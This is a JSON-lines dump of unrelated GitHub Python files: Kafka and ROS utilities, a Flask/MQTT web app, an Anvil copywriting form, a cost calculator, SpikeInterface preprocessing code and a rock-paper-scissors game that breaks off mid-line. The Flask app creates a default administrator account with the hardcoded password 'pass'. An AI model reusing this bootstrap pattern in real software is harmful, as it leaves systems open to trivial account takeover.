KeyboardInterrupt as k:\n print(\"Hello World inside Keyboard Exception \")\n except Exception as e:\n print(\"Closing\")\n print(e)\n","repo_name":"deepakddun/kafka-project","sub_path":"kafka_proj/aio_kafka_consumer.py","file_name":"aio_kafka_consumer.py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20509518915","text":"#!/usr/bin/env python\nimport os\nimport rospy\nimport numpy as np\nimport csv\n\nclass CSVLogger(object):\n '''\n CSV Data Logger\n '''\n def __init__(self, filename, results_dir):\n self.log_filename = rospy.get_param('~log_filename', filename)\n self.results_dir = results_dir\n\n def write_to_file(self, data, new_file=False):\n if os.path.isdir(self.results_dir):\n if not new_file:\n mode = 'a'\n else:\n mode = 'w'\n with open(os.path.join(self.results_dir, self.log_filename), mode) as fd:\n writer = csv.writer(fd)\n writer.writerow(data)\n fd.close()\n else:\n print(self.results_dir)\n rospy.logwarn(\"[CSV_LOGGER] log file path error\")\n","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/nodes/csv_logger.py","file_name":"csv_logger.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35955856729","text":"from flask import Flask, request\nfrom config import Configuration\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_security import SQLAlchemyUserDatastore\nfrom flask_security import Security\nfrom flask_marshmallow import Marshmallow\nfrom apispec import APISpec\nfrom flask_bcrypt import Bcrypt\nfrom datetime import datetime, timezone\n\nfrom threading import Lock\n\nfrom flask_apispec import FlaskApiSpec\nfrom apispec_webframeworks.flask import FlaskPlugin\nfrom apispec.ext.marshmallow import MarshmallowPlugin\n\nfrom flask_script import Manager\nfrom flask_migrate import Migrate\nfrom flask_socketio import SocketIO\n\nfrom socketio import *\nimport dbm\n\nimport paho.mqtt.client as paho\nimport threading\nimport time\nimport json\n\nclients = []\n\nthread = None\nthread_lock = Lock()\n\ndef background_thread():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n count = 0\n while True:\n socketio.sleep(10)\n count += 1\n socketio.emit('my_response',\n {'data': 'Server generated event', 'count': count})\n\n\nDB_URL = 'postgresql://{user}:{pw}@{url}/{db}'.format(user=Configuration.POSTGRES_USER,pw=Configuration.POSTGRES_PW,url=Configuration.POSTGRES_URL,db=Configuration.POSTGRES_DB)\n\n\napp = Flask(__name__) \napp.secret_key = Configuration.SEKRET_KEY\napp.config['SQLALCHEMY_DATABASE_URI'] = DB_URL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False \napp.config['UPLOAD_FOLDER'] = Configuration.UPLOAD_FOLDER\napp.config['UPLOAD_FOLDER'] = Configuration.ALLOWED_EXTENSIONS\napp.config.from_object(Configuration)\n\n\ndb = SQLAlchemy(app)\n\nmigrate = Migrate(app, db)\nmanager = Manager(app)\n\nma = Marshmallow(app)\nbcrypt = Bcrypt(app)\n\nasync_mode = \"threading\"\n\nsocketio = SocketIO(app, async_mode=async_mode)\n\n\nfrom models import *\nfrom schemas import *\n\nwatchingMarks = None\n\napp.config.update({\n 'APISPEC_SPEC': APISpec(\n title='bfg-database-api',\n version='v1',\n openapi_version='2.0.0',\n plugins=[MarshmallowPlugin()],\n ),\n 'APISPEC_SWAGGER_URL': '/swagger/'\n})\n\ndocs = FlaskApiSpec(app)\n\n#db.drop_all()\ndb.create_all()\ndb.session.commit()\n\nroles = UserRolesDB.query.all()\nfor role in roles:\n for table in editableTables:\n query = UserPermissionsDB.query.all()\n permissions = UserPermissionsDB.query.filter_by(table = table[0], role = role.role).all()\n if(len(permissions) == 0):\n item = UserPermissionsDB(\n table = table[0], \n role = role.role,\n get = False,\n put = False,\n delete = False,\n )\n db.session.add(item)\n db.session.commit() \n\nusers = UsersDB.query.filter_by(role = 'administrator').all()\nif(len(users) == 0):\n pass_hash = bcrypt.generate_password_hash('pass', 10) \n pass_hash_decoded = pass_hash.decode('utf-8') \n admin = UsersDB(\n login = 'root',\n username = 'administrator',\n password_hash = pass_hash_decoded,\n role = 'administrator')\n db.session.add(admin)\n db.session.commit() \n\n## -------------------------------------------------------------------------\n## -------------------------------------------------------------------------\n## -------------------------------------------------------------------------\n\nclass Mark_dict(object):\n\n def __init__(self):\n self.mark_storage = {}\n\n self.client = paho.Client(\"pahoMQTTClient\") \n self.broker = \"localhost\"\n self.port = 1883\n self.client.on_message = self.on_message\n self.client.connect(self.broker, self.port)\n\n def append(self, name, val):\n res = self.mark_storage.get(name)\n if res is None:\n self.mark_storage[name] = [val]\n ## create thread \n self.client.subscribe(name) \n #print(\"subscribe\", name) \n else:\n self.mark_storage[name].append(val)\n \n def delete(self, name, val):\n res = self.mark_storage.get(name)\n if res is not None:\n if (len(res) == 1):\n del self.mark_storage[name] \n ## delete thread \n self.client.unsubscribe(name) \n #print(\"unsubscribe\", name) \n else:\n try:\n self.mark_storage[name].remove(val)\n except ValueError:\n return False\n\n def delete_by_client_id(self, id):\n for key, val in self.mark_storage.copy().items():\n while id in val: val.remove(id)\n if (len(val) == 0):\n del self.mark_storage[key] \n ## delete thread \n self.client.unsubscribe(key) \n #print(\"unsubscribe\", key)\n\n def on_message(self, client, userdata, message):\n mes = str(message.payload.decode(\"utf-8\")) \n mes = json.loads(mes)\n mes[\"mark_id\"] = message.topic\n res = self.mark_storage.get(message.topic)\n if res is not None:\n for n in self.mark_storage[message.topic]:\n #print ('send: ', mes, ' to client: ', n) \n socketio.emit('on_message', mes, room = n)\n\n\ndef background_thread():\n global watchingMarks\n watchingMarks = Mark_dict() \n watchingMarks.client.loop_forever() \n\nthread = socketio.start_background_task(background_thread)\n\n@socketio.on('disconnect')\ndef disconnected():\n print('Client disconnected', request.sid)\n clients.remove(request.sid)\n watchingMarks.delete_by_client_id(request.sid) \n print('stopMarkWatching', request.sid)\n \n@socketio.event\ndef connect():\n print('Client connected!!', request.sid)\n clients.append(request.sid)\n\n@socketio.event\ndef addWatchingMark(mark_id):\n watchingMarks.append(mark_id['data'], request.sid) \n print('addWatchingMark', mark_id, request.sid)\n\n@socketio.event\ndef stopMarkWatching():\n watchingMarks.delete_by_client_id(request.sid) \n print('stopMarkWatching', request.sid)\n\n@socketio.event\ndef handle_my_custom_event(json):\n print('received json: ' + str(json))\n\n","repo_name":"bfgdatabase/site","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41729548991","text":"from ._anvil_designer import VideoSalesLetterTemplate\nfrom anvil import *\nimport time\nimport json\nimport anvil.server\nimport anvil.facebook.auth\nimport anvil.google.auth, anvil.google.drive\nfrom anvil.google.drive import app_files\nimport anvil.users\nimport anvil.tables as tables\nimport anvil.tables.query as q\nfrom anvil.tables import app_tables\nfrom anvil import tables\n\nfrom ..FinalProduct import FinalProduct\n############################################################################################################\n# LOADING\nclass VideoSalesLetter(VideoSalesLetterTemplate):\n def __init__(self, **properties):\n anvil.users.login_with_form()\n\n # Call the parent class's __init__ method\n super().__init__(**properties)\n # Initialize task_id attribute\n self.task_id = None\n # Initialize counter\n self.counter = 0\n self.indeterminate_progress_vsl.visible = False\n self.indeterminate_progress_vsl_themes.visible = False\n self.nav_button_vsl_to_final_product.enabled = True\n\n self.chosen_company_name = None\n self.chosen_product_name = None\n self.chosen_product_research = None\n self.chosen_avatar = None\n self.chosen_tone = None\n self.chosen_final_headline = None\n self.chosen_final_subheadline = None\n self.chosen_final_secondary_headline = None\n\n # Load stuff\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # COMPANY NAME\n chosen_company_name_row = user_table.search(variable='chosen_company_name')[0]\n self.chosen_company_name = chosen_company_name_row['variable_value']\n\n # COMPANY PROFILE\n chosen_company_profile_row = user_table.search(variable='chosen_company_profile')[0]\n self.chosen_company_profile = chosen_company_profile_row['variable_value']\n \n # PRODUCT NAME\n chosen_product_name_row = user_table.search(variable='chosen_product_name')[0]\n self.chosen_product_name = chosen_product_name_row['variable_value']\n\n # PRODUCT PROFILE\n chosen_product_research_row = user_table.search(variable='chosen_product_research')[0]\n self.chosen_product_research = chosen_product_research_row['variable_value']\n\n # AVATARS\n chosen_avatar_row = user_table.search(variable='chosen_avatar')[0]\n self.chosen_avatar = chosen_avatar_row['variable_value']\n\n # BRAND TONE\n chosen_tone_row = user_table.search(variable='chosen_tone')[0]\n self.chosen_tone = chosen_tone_row['variable_value']\n\n # SCRIPT FORMAT\n chosen_script_row = user_table.search(variable='chosen_script')[0]\n self.chosen_script = chosen_script_row['variable_value']\n\n # FINAL HEADLINE\n chosen_final_headline_row = user_table.search(variable='chosen_final_headline')[0]\n self.chosen_final_headline = chosen_final_headline_row['variable_value']\n\n # FINAL SUBHEADLINE\n chosen_final_subheadline_row = user_table.search(variable='chosen_final_subheadline')[0]\n self.chosen_final_subheadline = chosen_final_subheadline_row['variable_value']\n\n # FINAL SECONDARY HEADLINE\n chosen_final_secondary_headline_row = user_table.search(variable='chosen_final_secondary_headline')[0]\n self.chosen_final_secondary_headline = chosen_final_secondary_headline_row['variable_value']\n \n\n # Call set_saved_values to store the retrieved values in class-level variables\n self.set_saved_values(\n self.chosen_company_name,\n self.chosen_company_profile,\n self.chosen_product_name,\n self.chosen_product_research,\n self.chosen_tone,\n self.chosen_avatar,\n self.chosen_script,\n self.chosen_final_headline,\n self.chosen_final_subheadline,\n self.chosen_final_secondary_headline\n )\n\n def set_saved_values(self, chosen_company_name, chosen_company_profile, chosen_product_name, chosen_product_research, chosen_tone, chosen_avatar, chosen_script, chosen_final_headline, chosen_final_subheadline,chosen_final_secondary_headline):\n self.chosen_company_name = chosen_company_name\n self.chosen_company_profile = chosen_company_profile\n self.chosen_product_name = chosen_product_name\n self.chosen_product_research = chosen_product_research\n self.chosen_tone = chosen_tone\n self.chosen_avatar = chosen_avatar\n self.chosen_script = chosen_script\n self.chosen_final_headline = chosen_final_headline\n self.chosen_final_subheadline = chosen_final_subheadline\n self.chosen_final_secondary_headline = chosen_final_secondary_headline\n\n\n####### --------VIDEO SALES LETTER SCRIPT --------###################################################\n\n def generate_vsl_script_button_click(self, **event_args):\n with anvil.server.no_loading_indicator:\n self.indeterminate_progress_vsl.visible = True\n\n print(\"Generate Video Sales Letter Script button clicked\")\n # Use the saved values from the dropdowns\n\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n vsl_row = user_table.get(variable='vsl_script')\n \n # Find the example script\n row_chosen_script = user_table.search(variable='chosen_script')\n \n if row_chosen_script and row_chosen_script[0]['variable_title'] == 'Who, What, Where, How - 1':\n example_wwwh_1_row = app_tables.example_scripts.get(script='wwwh_1')\n example_script = example_wwwh_1_row['script_contents']\n elif row_chosen_script and row_chosen_script[0]['variable_title'] == 'Who, What, Where, How - 2':\n example_wwwh_2_row = app_tables.example_scripts.get(script='wwwh_2')\n example_script = example_wwwh_2_row['script_contents']\n elif self.chosen_script == 'Star, Story, Solution':\n example_sss_row = app_tables.example_scripts.get(script='sss')\n example_script = example_sss_row['script_contents']\n \n self.task_id = anvil.server.call('launch_generate_vsl_script', self.chosen_product_name, self.chosen_final_headline,self.chosen_final_subheadline, self.chosen_company_profile, self.chosen_product_research,self.chosen_avatar, self.chosen_tone, example_script)\n print(\"Task ID:\", self.task_id)\n # Launch the background task\n\n # Loop to check the status of the background task\n while True:\n with anvil.server.no_loading_indicator:\n # Check if the background task icomplete\n task_status = anvil.server.call('get_task_status', self.task_id)\n print(\"Task status:\", task_status)\n\n if task_status is not None:\n if task_status == \"completed\":\n # Get the result of the background task\n vsl_script = anvil.server.call('get_task_result', self.task_id)\n\n # Update the variable_table with the JSON string\n vsl_row['variable_value'] = vsl_script\n vsl_row.update()\n\n # Populate the textbox with the generated script\n self.video_sales_script_textbox.text = vsl_script\n\n # Hide the progress bar\n self.indeterminate_progress_vsl.visible = False\n break # Exit the loop\n\n elif task_status == \"failed\":\n # Handle the case where the background task failed\n print(\"Task failed\")\n break # Exit the loop\n\n # Sleep for 1 second before checking again\n time.sleep(1)\n\n# ####### --------VIDEO SALES LETTER THEMES --------###################################################\n def generate_vsl_themes_button_click(self, **event_args):\n with anvil.server.no_loading_indicator:\n self.indeterminate_progress_vsl_themes.visible = True\n # Check if the video sales script textbox is empty\n if not self.video_sales_script_textbox.text:\n anvil.js.window.alert(\"Please Create a Video Sales Script Before Generating your themes.\")\n return \n else:\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n \n row = user_table.get(variable='vsl_themes')\n vsl_theme_1_row = user_table.get(variable='vsl_theme_1')\n vsl_theme_2_row = user_table.get(variable='vsl_theme_2')\n vsl_theme_3_row = user_table.get(variable='vsl_theme_3')\n vsl_theme_4_row = user_table.get(variable='vsl_theme_4')\n \n self.task_id = anvil.server.call('launch_generate_vsl_themes', self.chosen_final_headline, self.chosen_final_subheadline, self.chosen_product_name, self.chosen_product_research, self.chosen_tone,self.video_sales_script_textbox,row)\n print(\"Task ID:\", self.task_id)\n # Launch the background task\n \n # Loop to check the status of the background task\n while True:\n with anvil.server.no_loading_indicator:\n # Check if the background task is complete\n task_status = anvil.server.call('get_task_status', self.task_id)\n print(\"Task status:\", task_status)\n \n if task_status is not None:\n if task_status == \"completed\":\n # Get the result of the background task\n all_vsl_themes_json = anvil.server.call('get_task_result', self.task_id)\n \n if all_vsl_themes_json is not None:\n # Convert the JSON string back to a list\n all_vsl_themes = json.loads(all_vsl_themes_json)\n # Update the text boxes with the headlines\n self.vsl_theme_1.text = all_vsl_themes[0]\n self.vsl_theme_2.text = all_vsl_themes[1]\n self.vsl_theme_3.text = all_vsl_themes[2]\n self.vsl_theme_4.text = all_vsl_themes[3]\n \n # Update the rows in the 'variable' column of the 'mdia' table\n vsl_theme_1_row['variable_value'] = all_vsl_themes[0]\n vsl_theme_2_row['variable_value'] = all_vsl_themes[1]\n vsl_theme_3_row['variable_value'] = all_vsl_themes[2]\n vsl_theme_4_row['variable_value'] = all_vsl_themes[3]\n \n vsl_theme_1_row.update()\n vsl_theme_2_row.update()\n vsl_theme_3_row.update()\n vsl_theme_4_row.update()\n \n # Update the variable_table with the JSON string\n row['variable_value'] = all_vsl_themes_json\n row.update()\n else:\n print(\"Error: Row not found in user_table\")\n \n self.indeterminate_progress_vsl_themes.visible = False\n break # Exit the loop\n \n elif task_status == \"failed\":\n # Handle the case where the background task failed\n print(\"Task failed\")\n break # Exit the loop\n \n # Sleep for 1 second before checking again\n time.sleep(1)\n\n# #### ----- SAVING AND LOADING------------#########################################################################################################\n\n def edit_company_profile_component_click(self, **event_args):\n self.company_profile_textbox.read_only = False\n\n def save_vsl_script_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n row = user_table.get(variable='vsl_script')\n\n # Update the video sales column for the current user\n if row:\n text = self.video_sales_script_textbox.text\n row['variable_value'] = text\n row.update()\n else:\n # Handle case where the row does not exist for the current user\n print(\"No row found for the current user\")\n\n def save_vsl_themes_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # Update vsl_theme_1\n vsl_theme_1_rows = user_table.search(variable='vsl_theme_1')\n if vsl_theme_1_rows:\n vsl_theme_1_row = vsl_theme_1_rows[0]\n vsl_theme_1_row['variable_value'] = self.vsl_theme_1.text\n vsl_theme_1_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_1\n print(\"No row found for vsl_theme_1\")\n\n # Update vsl_theme_2\n vsl_theme_2_rows = user_table.search(variable='vsl_theme_2')\n if vsl_theme_2_rows:\n vsl_theme_2_row = vsl_theme_2_rows[0]\n vsl_theme_2_row['variable_value'] = self.vsl_theme_2.text\n vsl_theme_2_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_2\n print(\"No row found for vsl_theme_2\")\n\n # Update vsl_theme_3\n vsl_theme_3_rows = user_table.search(variable='vsl_theme_3')\n if vsl_theme_3_rows:\n vsl_theme_3_row = vsl_theme_3_rows[0]\n vsl_theme_3_row['variable_value'] = self.vsl_theme_3.text\n vsl_theme_3_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_3\n print(\"No row found for vsl_theme_3\")\n\n # Update vsl_theme_4\n vsl_theme_4_rows = user_table.search(variable='vsl_theme_4')\n if vsl_theme_4_rows:\n vsl_theme_4_row = vsl_theme_4_rows[0]\n vsl_theme_4_row['variable_value'] = self.vsl_theme_4.text\n vsl_theme_4_row.update()\n else:\n # Handle case where no rows are found for vsl_theme_4\n print(\"No row found for vsl_theme_4\")\n\n\n def load_vsl_themes_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n # Load vsl_theme_1\n vsl_theme_1_rows = user_table.search(variable='vsl_theme_1')\n if vsl_theme_1_rows:\n vsl_theme_1_row = vsl_theme_1_rows[0]\n self.vsl_theme_1.text = vsl_theme_1_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_1\n print(\"No row found for vsl_theme_1\")\n\n # Load vsl_theme_2\n vsl_theme_2_rows = user_table.search(variable='vsl_theme_2')\n if vsl_theme_2_rows:\n vsl_theme_2_row = vsl_theme_2_rows[0]\n self.vsl_theme_2.text = vsl_theme_2_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_2\n print(\"No row found for vsl_theme_2\")\n\n # Load vsl_theme_3\n vsl_theme_3_rows = user_table.search(variable='vsl_theme_3')\n if vsl_theme_3_rows:\n vsl_theme_3_row = vsl_theme_3_rows[0]\n self.vsl_theme_3.text = vsl_theme_3_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_3\n print(\"No row found for vsl_theme_3\")\n\n # Load vsl_theme_4\n vsl_theme_4_rows = user_table.search(variable='vsl_theme_4')\n if vsl_theme_4_rows:\n vsl_theme_4_row = vsl_theme_4_rows[0]\n self.vsl_theme_4.text = vsl_theme_4_row['variable_value']\n else:\n # Handle case where no rows are found for vsl_theme_4\n print(\"No row found for vsl_theme_4\")\n\n\n def save_chosen_headlines_button_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n final_headline_rows = user_table.search(variable='final_headline')\n if final_headline_rows:\n final_headline_row = final_headline_rows[0]\n final_headline_row['variable_value'] = self.main_headline_textbox.text\n final_headline_row.update()\n else:\n # Handle case where no rows are found for final_headline\n print(\"No row found for final_headline\")\n\n final_subheadline_rows = user_table.search(variable='final_subheadline')\n if final_subheadline_rows:\n final_subheadline_row = final_subheadline_rows[0]\n final_subheadline_row['variable_value'] = self.subheadline_textbox.text\n final_subheadline_row.update()\n else:\n # Handle case where no rows are found for final_subheadline\n print(\"No row found for final_subheadline\")\n\n final_secondary_headline_rows = user_table.search(variable='final_secondary_headline')\n if final_secondary_headline_rows:\n final_secondary_headline_row = final_secondary_headline_rows[0]\n final_secondary_headline_row['variable_value'] = self.secondary_headline_textbox.text\n final_secondary_headline_row.update()\n else:\n # Handle case where no rows are found for final_secondary_headline\n print(\"No row found for final_secondary_headline\")\n\n def load_vsl_script_component_click(self, **event_args):\n current_user = anvil.users.get_user()\n user_table_name = current_user['user_id']\n # Get the table for the current user\n user_table = getattr(app_tables, user_table_name)\n\n load_vsl_rows = user_table.search(variable='vsl_script')\n if load_vsl_rows:\n loaded_vsl_script = load_vsl_rows[0]['variable_value']\n self.video_sales_script_textbox.text = loaded_vsl_script\n print(\"Contents:\", loaded_vsl_script)\n else:\n # Handle case where no rows are found for vsl_script\n print(\"No row found for vsl_script\")\n\n# ############################################################################################################\n# # NAVIGATION\n\n\n def nav_button_vsl_to_final_product_click(self, **event_args):\n # Check if any of the textboxes are empty\n if not self.vsl_theme_1.text or not self.vsl_theme_2.text or not self.vsl_theme_3.text or not self.vsl_theme_4.text:\n # If any of the vsl_theme textboxes are empty, show an alert\n anvil.js.window.alert(\"Please enter all 4 main theme excerpts before proceeding\")\n return\n else: \n anvil.open_form('FinalProduct')\n \n# NAVIGATION\n\n# # Define the function to navigate to the 'Company' form\n# def navigate_to_headlines(self, **event_args):\n# anvil.open_form('Company')\n\n # def finalproduct_page_link_click(self, **event_args):\n # finalproduct=FinalProduct()\n # self.content_panel.clear()\n # self.content_panel.add_component(finalproduct)\n\n\n#INTRO\n\n # # Get the rows for company profiles\n # company_profile_rows = [\n # user_table.search(variable='company_profile_1')[0],\n # user_table.search(variable='company_profile_2')[0],\n # user_table.search(variable='company_profile_3')[0]\n # ]\n # # Extract the values from the rows\n # company_profiles = [row['variable_title'] for row in company_profile_rows]\n # # Assign the values to the company_profile_dropdown\n # self.company_profile_dropdown.items = company_profiles\n\n \n\n # def nav_button_VSL_Elements_to_headline(self, **event_args):\n # headlines = Headlines()\n # self.content_panel.clear()\n # self.content_panel.add_component(headlines)\n\n def outlined_button_1_click(self, **event_args):\n \"\"\"This method is called when the button is clicked\"\"\"\n pass\n\n def nav_back_to_headlines(self, **event_args):\n anvil.open_form('Headlines')\n \n\n\n","repo_name":"TMoneyBidness/funnelwriter-3-5","sub_path":"client_code/VideoSalesLetter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44098228450","text":"\nfrom copy import deepcopy\nimport math\n\nfrom base import Manufacturable\n\n\ndef apply_blueprints_to_item(item, blueprints):\n \"\"\"\n Applies all of the blueprints to the item's ME * TE\n\n :param items: Item\n :type items: Manufacturable\n :param blueprints: Incoming body of {\n Item: {\"material_efficiency\": Value, \"time_efficiency\": Value}, ..\n }\n :type blueprints: dict\n :returns: Nothing\n :rtype: None\n \"\"\"\n\n item.set_material_efficiency(\n material_efficiency=blueprints.get(item, {}).get(\n \"material_efficiency\", 0\n )\n )\n item.set_time_efficiency(\n time_efficiency=blueprints.get(item, {}).get(\"time_efficiency\", 0)\n )\n\n\ndef apply_blueprints_to_multiple_items(items, blueprints):\n \"\"\"\n Applies all of the blueprints to the items' ME * TE with in the items dict\n\n :param items: Incoming body of {Item: amount, ..}\n :type items: dict\n :param blueprints: Incoming body of {\n Item: {\"material_efficiency\": Value, \"time_efficiency\": Value}, ..\n }\n :type blueprints: dict\n :returns: Nothing\n :rtype: None\n \"\"\"\n\n for item in items.keys():\n apply_blueprints_to_item(item, blueprints)\n\n\ndef get_next_requirement(\n item, number_of_runs=1, requirements={}, depth=0, blueprints={}\n):\n \"\"\"\n Returns a shopping list requirement of all materials needed to produce\n the item in question (till depth is reached)\n\n :param item: Item that is a requirement\n :type item: MarketItem\n :param number_of_runs: How many runs to do in order to complete the job\n :type number_of_runs: int\n :param requirements: What does it take to make this?\n {MarketItem: amount}\n :type requirements: dict\n :param depth: How far down to go the requirements list\n -1 goes till end\n 0 stops item.requirements\n n goes till n == 0\n :type depth: int\n :param blueprints: Material/Time efficiency values for given blueprints\n :type blueprints: dict\n \"\"\"\n\n # Prevents a memory leak from happening if someone does not provide a dict\n requirements = deepcopy(requirements)\n\n apply_blueprints_to_item(item, blueprints)\n\n for sub_item, amount in item.requirements.items():\n amount *= number_of_runs\n if (\n isinstance(sub_item, Manufacturable) and\n sub_item.requirements != {} and\n depth != 0\n ):\n requirements = get_next_requirement(\n sub_item,\n number_of_runs=math.ceil(\n float(amount) / float(sub_item.produces)\n ),\n requirements=requirements,\n depth=depth-1,\n blueprints=blueprints\n )\n\n requirements.setdefault(sub_item, 0)\n requirements[sub_item] += amount\n\n return requirements\n","repo_name":"kusinwolf/indi-calc","sub_path":"costs.py","file_name":"costs.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71603138409","text":"con, result = int(input()), []\r\n\r\nfor i in range(con):\r\n expressao = input()\r\n cont = 0\r\n\r\n for c in expressao:\r\n if c == '(': cont += 1\r\n elif c == ')': cont -= 1\r\n if cont < 0: break\r\n\r\n if cont == 0: result.append(\"OK\")\r\n else: result.append(\"NOK\")\r\n\r\nfor i,valor in enumerate(result):\r\n if i != len(result) - 1: print(valor)\r\n else: print(valor, end=\"\")\r\n","repo_name":"kaiquesouzasantos/estudos-python","sub_path":"Competicoes/MaratonaSaoJudas/abriuFechou.py","file_name":"abriuFechou.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888563257","text":"import numpy as np\nfrom spikeinterface.core import BaseRecording, BaseRecordingSegment\nfrom .basepreprocessor import BasePreprocessor, BasePreprocessorSegment\nfrom spikeinterface.core.core_tools import define_function_from_class\n\n\nclass DirectionalDerivativeRecording(BasePreprocessor):\n name = \"directional_derivative\"\n installed = True\n\n def __init__(\n self,\n recording: BaseRecording,\n direction: str = \"y\",\n order: int = 1,\n edge_order: int = 1,\n dtype=\"float32\",\n ):\n \"\"\"Take derivative of any `order` along `direction`\n\n np.gradient is applied independently along each colum (direction='y')\n or row (direction='x'). Accounts for channel spacings and boundary\n issues using np.gradient -- see that function's documentation for\n more information about `edge_order`.\n\n When order=0, the column means are subtracted at each frame\n (spatial common reference).\n\n Parameters\n ----------\n recording : BaseRecording\n recording to zero-pad\n direction : str\n Gradients will be taken along this dimension.\n order : int\n np.gradient will be applied this many times.\n edge_order : int\n Order of gradient accuracy at edges; see np.gradient for details.\n dtype : optional numpy dtype\n If unset, parent dtype is preserved, but the derivative can\n overflow or lose accuracy, so \"float32\" by default.\n \"\"\"\n parent_channel_locations = recording.get_channel_locations()\n dim = [\"x\", \"y\", \"z\"].index(direction)\n if dim > parent_channel_locations.shape[1]:\n raise ValueError(f\"Direction {direction} not present in this recording.\")\n\n # float32 by default if parent recording is integer\n dtype_ = dtype\n if dtype_ is None:\n dtype_ = recording.dtype\n\n BasePreprocessor.__init__(self, recording, dtype=dtype_)\n\n for parent_segment in recording._recording_segments:\n rec_segment = DirectionalDerivativeRecordingSegment(\n parent_segment,\n parent_channel_locations,\n dim,\n order,\n edge_order,\n dtype_,\n )\n self.add_recording_segment(rec_segment)\n\n self._kwargs = dict(\n recording=recording,\n direction=direction,\n order=order,\n edge_order=edge_order,\n dtype=dtype,\n )\n\n\nclass DirectionalDerivativeRecordingSegment(BasePreprocessorSegment):\n def __init__(\n self,\n parent_recording_segment: BaseRecordingSegment,\n channel_locations: np.array,\n dim: int,\n order: int,\n edge_order: int,\n dtype,\n ):\n BasePreprocessorSegment.__init__(self, parent_recording_segment)\n self.parent_recording_segment = parent_recording_segment\n self.channel_locations = channel_locations\n self.order = order\n self.edge_order = edge_order\n self.dim = dim\n self._dtype = dtype\n\n # get unique positions along dims other than `direction`\n # channels at the same positions along these other dims are considered\n # to belong to a \"column\"/\"row\", and the derivative is applied in these\n # groups along `direction`\n ndim = self.channel_locations.shape[1]\n geom_other_dims = self.channel_locations[:, np.arange(ndim) != self.dim]\n # column_inds is the column grouping by channel,\n # so that geom_other_dims[i] == unique_pos_other_dims[column_inds[i]]\n self.unique_pos_other_dims, self.column_inds = np.unique(geom_other_dims, axis=0, return_inverse=True)\n\n def get_traces(self, start_frame, end_frame, channel_indices):\n if start_frame is None:\n start_frame = 0\n if end_frame is None:\n end_frame = self.get_num_samples()\n\n parent_traces = self.parent_recording_segment.get_traces(\n start_frame=start_frame,\n end_frame=end_frame,\n channel_indices=slice(None),\n )\n parent_traces = parent_traces.astype(self._dtype)\n\n # calculate derivative independently in each column\n derivative_traces = np.empty_like(parent_traces)\n for column_ix, other_pos in enumerate(self.unique_pos_other_dims):\n chans_in_column = np.flatnonzero(self.column_inds == column_ix)\n dim_pos_in_column = self.channel_locations[chans_in_column, self.dim]\n\n if dim_pos_in_column.size == 1:\n column_traces = np.zeros((parent_traces.shape[0], 1), dtype=self._dtype)\n else:\n column_traces = parent_traces[:, chans_in_column]\n for _ in range(self.order):\n column_traces = np.gradient(\n column_traces,\n dim_pos_in_column,\n axis=1,\n edge_order=self.edge_order,\n )\n\n # when order=0, do a spatial common reference\n if self.order == 0:\n column_traces -= column_traces.mean(axis=1, keepdims=True)\n\n derivative_traces[:, chans_in_column] = column_traces\n\n return derivative_traces\n\n\n# function for API\ndirectional_derivative = define_function_from_class(\n source_class=DirectionalDerivativeRecording, name=\"directional_derivative\"\n)\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/preprocessing/directional_derivative.py","file_name":"directional_derivative.py","file_ext":"py","file_size_in_byte":5483,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"11212319504","text":"# Python Rock Paper Scissors Game\nimport random\nfrom enum import IntEnum\n\n# enum class to assign attributes to rock, paper, and scissors\nclass Hand(IntEnum):\n rock = 1\n paper = 2\n scissors = 3\n\n\n# while-if block to determine the winner of the game.\nplay_again = False\nwhile not play_again:\n # gets the player choice\n player_choice = int(input(\"Please enter a number:\\nrock (1)\\npaper (2)\\nscissors (3)\\n\\n\"))\n player_choice = Hand(player_choice)\n # gets the computer choice from a list of choices\n cpu_choice = Hand(random.randint(1, 3))\n if cpu_choice == player_choice:\n print(\"Tie! Go again!\")\n # rock choice\n elif player_choice == 1:\n if cpu_choice == 2:\n print(\"The Computer chose: \" + Hand(2).name + 